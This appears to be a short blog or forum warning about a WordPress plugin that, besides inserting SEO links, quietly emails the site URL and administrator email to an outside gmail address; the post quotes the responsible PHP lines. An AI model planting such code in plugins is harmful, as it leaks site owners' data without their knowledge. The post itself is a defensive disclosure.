As well as adding links to an SEO site, the plugin also grabs your administrator email address and mails it off to a gmail account:
$subj = get_option('siteurl');
$msg = "Installed" ;
$from = get_option('admin_email');
mail("waytouptomez@gmail.com", $subj, $msg, $from);
I can't tell whether this is deliberate on the part of the author, or a hack, but either way this plugin cannot currently be trusted unless you are willing to manually edit out the nasties.